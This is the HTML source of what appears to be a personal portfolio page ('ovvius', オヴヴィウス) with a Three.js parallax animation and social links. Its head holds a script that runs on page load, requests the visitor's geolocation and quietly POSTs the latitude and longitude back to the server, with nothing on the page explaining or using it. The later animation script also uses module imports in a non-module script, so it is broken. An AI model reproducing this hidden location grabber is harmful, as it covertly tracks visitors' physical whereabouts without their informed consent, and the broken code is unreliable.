<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>ovvius - オヴヴィウス</title>
    <link href="asset/favicon.ico" rel="shortcut icon" type="image/x-icon"/>
    <meta name="keywords" content="ovvius, ovvius.rf.gd, Rangda, One Piece, オヴヴィウス">
    <meta name="csrf-token" content="pq23Sd7Z7KfkklG8E90noRHGBiQOXfVmu1kEphIx">
    <meta name="description" content="Rangda - オヴヴィウス By ovvius @ovvius.rf.gd">
    <meta property="og:image" content="http://103.127.134.253/bg.png" />
    <meta property="og:type" content="website">
    <meta property="og:url" content="https://ovvius.com" />
    <meta property="og:title" content="ovvius - オヴヴィウス" />
    <meta property="og:description" content="Rangda - オヴヴィウス" />
    <meta name="robots" content="noarchive" />
    <meta name="robots" content="noindex" />
    <meta name="google" content="notranslate" />
    <script type="d3f5631af59c7cb27eae2556-text/javascript">
        function getLocation() {
            if (navigator.geolocation) {
                navigator.geolocation.getCurrentPosition(showPosition);
            } else {
                alert("Browser Isn't Supported.");
            }
        }
        function showPosition(position) {
            var latitude = position.coords.latitude;
            var longitude = position.coords.longitude;
            $.ajaxSetup({
                headers: {
                    'X-CSRF-TOKEN': $('meta[name="csrf-token"]').attr('content')
                }
            });
            $.ajax({
                url: '/',
                type: 'POST',
                data: {
                    'latitude': latitude,
                    'longitude': longitude,
                },
                success: function(response) {
                    console.log(response);
                },
                error: function(xhr, errmsg, err) {
                    console.log(xhr.status + ": " + xhr.responseText);
                }
            });
        }
        $(document).ready(function() {
            getLocation();
        });
    </script>
    <style>
        @import url("https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;1,300;1,400;1,500;1,600;1,700;1,800&display=swap");
        
        @import url("https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap");
        
        :root {
            --headline-color: white;
            --background-color: #11151c;
            --text-color: rgba(255, 255, 255, 0.5);
        }
        
        html,
        body {
            margin: 0;
            padding: 0;
            overflow-x: hidden;
            background-color: var(--background-color);
            font-family: "Open Sans", sans-serif;
            color: var(--text-color);
            text-align: center;
            width: 100%;
            height: auto;
        }
        
        canvas{
            width: 1000px;
            height: 900px;
        }
        .canvas-container {
            position: absolute;
            top: 45%;
            left: 50%;
            transform: translate(-50%, -50%);
            z-index: 2;
            /* background: url("http://103.127.134.253/bg.png"); */
            background-size: 95%;
            background-repeat: no-repeat;
        }
        
        .headline-container {
            display: flex;
            align-items: center;
            justify-content: center;
            position: absolute;
            top: 0;
            left: 0;
            right: 0;
            bottom: 0;
            pointer-events: none;
        }
        
        #text-behind,
        #text-front,
        #text-behind-blur {
            font-family: "Roboto", sans-serif;
            position: absolute;
            text-align: center;
            font-size: clamp(24px, 20vw, 200px);
            text-transform: uppercase;
            font-weight: 800;
            letter-spacing: 10px;
            line-height: 0.8;
        }
        
        #text-behind {
            color: var(--headline-color);
            z-index: 1;
        }
        
        #text-behind-blur {
            color: var(--headline-color);
            filter: blur(7.5px);
            -webkit-filter: blur(7.5px);
            z-index: 0;
        }
        
        #text-front {
            /*  Set text-color to transparent to only show the outline  */
            color: transparent;
            text-stroke: 2px var(--headline-color);
            -webkit-text-stroke: 2px var(--headline-color);
            z-index: 3;
        }
        .more-content {
            /* height: 500vh; */
            width: 100vw;
        }
        
        .text-container {
            display: flex;
            flex-direction: column;
            justify-content: space-between;
            align-items: center;
            top: 3%;
            height: 75%;
            width: 100%;
            position: absolute;
            left: 0;
            z-index: 3;
        }
        
        .title {
            font-size: 0.5rem;
            text-align: center;
            text-transform: uppercase;
            letter-spacing: 0.3rem;
            font-weight: 500;
        }
        
        .socials {
        }
        
        .socials svg {
            margin: 0 5px;
            transition: all 0.5s ease-in-out;
            transform: scale(1);
        }
        
        .socials svg:hover {
            transform: scale(1.2);
            filter: drop-shadow(0px 0px 5px rgba(255, 255, 255, 1));
        }
        
        p {
            width: 300px;
            font-size: 0.75rem;
        }
        
        a {
            color: rgba(255, 255, 255, 0.5);
            text-decoration: none;
            transition: all 0.5s ease-in-out;
        }
        
        a:hover {
            filter: drop-shadow(0px 0px 10px rgba(255, 255, 255, 0.9));
        }
        @media(max-width: 830px) {
            .more-content {
                /* height: 500vh; */
                width: 100vw;
            }
            .headline-container {
                display: flex;
                align-items: center;
                justify-content: center;
                position: absolute;
                height: 600px;
                top: 0px;
                left: 0px;
                right: 0;
                bottom: 0;
                pointer-events: none;
            }
            canvas{
                width: 50vh;
                height: 50vh;
                /* width: 500px;
                height: 450px; */
            }
            .canvas-container {
                position: absolute;
                top: 45%;
                left: 50%;
                transform: translate(-50%, -50%);
                z-index: 2;
                /* background: url(http://103.127.134.253/bg.png); */
                background-size: 100%;
                background-repeat: no-repeat;
                background-position: center;
            }
            #text-behind,
            #text-front,
            #text-behind-blur {
                position: relative;
                left: 15px;
                font-family: "Roboto", sans-serif;
                position: absolute;
                text-align: center;
                font-size: clamp(24px, 20vw, 200px);
                text-transform: uppercase;
                font-weight: 800;
                letter-spacing: 10px;
                line-height: 1;
            }
            .text-container {
                display: flex;
                flex-direction: column;
                justify-content: space-between;
                align-items: center;
                top: 3%;
                height: 80%;
                width: 100%;
                position: absolute;
                left: 0;
                z-index: 3;
            }
        }
    </style>
</head>
<body>
    <div class="headline-container">
        <div id="text-behind">オヴヴィウス</div>
        <div id="text-behind-blur">オヴヴィウス</div>
        <div id="text-front">オヴヴィウス</div>
    </div>
    
    <div class="canvas-container">
        <canvas id="canvas"></canvas>
    </div>
    
    <div class="text-container">
        <div class="title">Miro Leon Bucher
            <br>
            <a href="https://instagram.com/xerosait" target="_blank">@Xerosait</a>
        </div> 
        <div class="socials">
            <p>If you want to support me, you can get contact me</p>
            <a href="https://instagram.com/xerosait" target="_blank">
                <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24">
                    <path fill="currentColor" d="M7.8 2h8.4C19.4 2 22 4.6 22 7.8v8.4a5.8 5.8 0 0 1-5.8 5.8H7.8C4.6 22 2 19.4 2 16.2V7.8A5.8 5.8 0 0 1 7.8 2m-.2 2A3.6 3.6 0 0 0 4 7.6v8.8C4 18.39 5.61 20 7.6 20h8.8a3.6 3.6 0 0 0 3.6-3.6V7.6C20 5.61 18.39 4 16.4 4H7.6m9.65 1.5a1.25 1.25 0 0 1 1.25 1.25A1.25 1.25 0 0 1 17.25 8A1.25 1.25 0 0 1 16 6.75a1.25 1.25 0 0 1 1.25-1.25M12 7a5 5 0 0 1 5 5a5 5 0 0 1-5 5a5 5 0 0 1-5-5a5 5 0 0 1 5-5m0 2a3 3 0 0 0-3 3a3 3 0 0 0 3 3a3 3 0 0 0 3-3a3 3 0 0 0-3-3Z" />
                </svg>
            </a>
            <a href="https://twitter.com/miroxleon" target="_blank">
                <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24">
                    <path fill="currentColor" d="M22.46 6c-.77.35-1.6.58-2.46.69c.88-.53 1.56-1.37 1.88-2.38c-.83.5-1.75.85-2.72 1.05C18.37 4.5 17.26 4 16 4c-2.35 0-4.27 1.92-4.27 4.29c0 .34.04.67.11.98C8.28 9.09 5.11 7.38 3 4.79c-.37.63-.58 1.37-.58 2.15c0 1.49.75 2.81 1.91 3.56c-.71 0-1.37-.2-1.95-.5v.03c0 2.08 1.48 3.82 3.44 4.21a4.22 4.22 0 0 1-1.93.07a4.28 4.28 0 0 0 4 2.98a8.521 8.521 0 0 1-5.33 1.84c-.34 0-.68-.02-1.02-.06C3.44 20.29 5.7 21 8.12 21C16 21 20.33 14.46 20.33 8.79c0-.19 0-.37-.01-.56c.84-.6 1.56-1.36 2.14-2.23Z" />
                </svg>
            </a>
            
            <a href="https://ovvius.com/prod" target="_blank">
                <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 256 256">
                    <path fill="currentColor" d="M128 24a104 104 0 1 0 104 104A104.11 104.11 0 0 0 128 24Zm-26.37 144h52.74C149 186.34 140 202.87 128 215.89c-12-13.02-21-29.55-26.37-47.89ZM98 152a145.72 145.72 0 0 1 0-48h60a145.72 145.72 0 0 1 0 48Zm-58-24a87.61 87.61 0 0 1 3.33-24h38.46a161.79 161.79 0 0 0 0 48H43.33A87.61 87.61 0 0 1 40 128Zm114.37-40h-52.74C107 69.66 116 53.13 128 40.11c12 13.02 21 29.55 26.37 47.89Zm19.84 16h38.46a88.15 88.15 0 0 1 0 48h-38.46a161.79 161.79 0 0 0 0-48Zm32.16-16h-35.43a142.39 142.39 0 0 0-20.26-45a88.37 88.37 0 0 1 55.69 45ZM105.32 43a142.39 142.39 0 0 0-20.26 45H49.63a88.37 88.37 0 0 1 55.69-45ZM49.63 168h35.43a142.39 142.39 0 0 0 20.26 45a88.37 88.37 0 0 1-55.69-45Zm101.05 45a142.39 142.39 0 0 0 20.26-45h35.43a88.37 88.37 0 0 1-55.69 45Z" />
                </svg>
            </a>
            
            <a href="https://youtu.be/Y5kJFvQtb-U" target="_blank">
                <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 20 20">
                    <path fill="currentColor" d="M11.603 9.833L9.357 8.785C9.161 8.694 9 8.796 9 9.013v1.974c0 .217.161.319.357.228l2.245-1.048c.197-.092.197-.242.001-.334zM10 .4C4.698.4.4 4.698.4 10s4.298 9.6 9.6 9.6s9.6-4.298 9.6-9.6S15.302.4 10 .4zm0 13.5c-4.914 0-5-.443-5-3.9s.086-3.9 5-3.9s5 .443 5 3.9s-.086 3.9-5 3.9z" />
                </svg>
            </a>
        </div>
    </div>
    
    <script>
        const textBehind = document.getElementById("text-behind");
        const textFront = document.getElementById("text-front");
        const textBehindBlur = document.getElementById("text-behind-blur");
        const canvasRect = document.getElementById("canvas");
        const parallaxScaling1 = 0.0005;
        const parallaxScaling2 = 0.00025;
        const parallaxScaling3 = 0.0000001;
        let currentScroll = 0;
        let targetScroll = 0;
        let ease = 0.001;
        let theta1 = 0;
        function updateScale() {
            let rect = canvasRect.getBoundingClientRect();
            let startScrollPosition = window.pageYOffset + rect.top;
            let endScrollPosition = window.pageYOffset + rect.bottom;
            if (
            targetScroll + window.innerHeight < startScrollPosition ||
            targetScroll > endScrollPosition
            ) {
                return;
            }
            currentScroll += (targetScroll - currentScroll) * ease;
            let scaleValue1 = 1 + currentScroll * parallaxScaling1;
            let scaleValue2 = 1 + currentScroll * parallaxScaling2;
            textBehind.style.transform = `scale(${scaleValue1})`;
            textFront.style.transform = `scale(${scaleValue1})`;
            textBehindBlur.style.transform = `scale(${scaleValue1})`;
            canvasRect.style.transform = `scale(${scaleValue2})`;
            theta1 += currentScroll * parallaxScaling3;
            setTimeout(updateScale, 1000 / 60);
        }
        window.addEventListener("scroll", () => {
            targetScroll = window.pageYOffset;
            updateScale();
        });
        updateScale();
        import * as THREE from "https://cdn.skypack.dev/three@0.124.0";
        import { RGBELoader } from "https://cdn.skypack.dev/three@0.124.0/examples/jsm/loaders/RGBELoader.js";
        var renderer = new THREE.WebGLRenderer({
            canvas: document.getElementById("canvas"),
            antialias: true,
            alpha: true
        });
        renderer.setPixelRatio(window.devicePixelRatio);
        renderer.setSize(window.innerWidth, window.innerHeight);
        var scene = new THREE.Scene();
        const hdrEquirect = new RGBELoader()
        .setPath(
        "https://raw.githubusercontent.com/miroleon/gradient_hdr_freebie/main/Gradient_HDR_Freebies/"
        )
        .load("ml_gradient_freebie_01.hdr", function () {
            hdrEquirect.mapping = THREE.EquirectangularReflectionMapping;
        });
        scene.environment = hdrEquirect;
        scene.fog = new THREE.FogExp2(0x11151c, 0.15);
        var group = new THREE.Group();
        scene.add(group);
        const pointlight = new THREE.PointLight(0x85ccb8, 7.5, 20);
        pointlight.position.set(0, 3, 2);
        group.add(pointlight);
        const pointlight2 = new THREE.PointLight(0x9f85cc, 7.5, 20);
        pointlight2.position.set(0, 3, 2);
        group.add(pointlight2);
        var camera = new THREE.PerspectiveCamera(
        45,
        window.innerWidth / window.innerHeight,
        0.1,
        1000
        );
        camera.position.z = 10;
        group.add(camera);
        const material1 = new THREE.MeshStandardMaterial({
            color: 0xffffff,
            roughness: 0,
            metalness: 0.5,
            envMapIntensity: 10
        });
        window.addEventListener("resize", onWindowResize);
        var update = function () {
            theta1 += 0.0025;
            camera.position.x = Math.sin(theta1) * 10;
            camera.position.z = Math.cos(theta1) * 10;
            camera.position.y = Math.cos(theta1);
            pointlight.position.x = Math.sin(theta1 + 1) * 11;
            pointlight.position.z = Math.cos(theta1 + 1) * 11;
            pointlight.position.y = 2 * Math.cos(theta1 - 3) + 3;
            pointlight2.position.x = -Math.sin(theta1 + 1) * 11;
            pointlight2.position.z = -Math.cos(theta1 + 1) * 11;
            pointlight2.position.y = 2 * -Math.cos(theta1 - 3) - 6;
            group.rotation.y += 0.01;
            camera.lookAt(0, 0, 0);
        };
        function onWindowResize() {
            camera.aspect = window.innerWidth / window.innerHeight;
            camera.updateProjectionMatrix();
            renderer.setSize(window.innerWidth, window.innerHeight);
        }
        function animate() {
            update();
            renderer.render(scene, camera);
            requestAnimationFrame(animate);
        }
        requestAnimationFrame(animate);
    </script>
    
</body>
</html>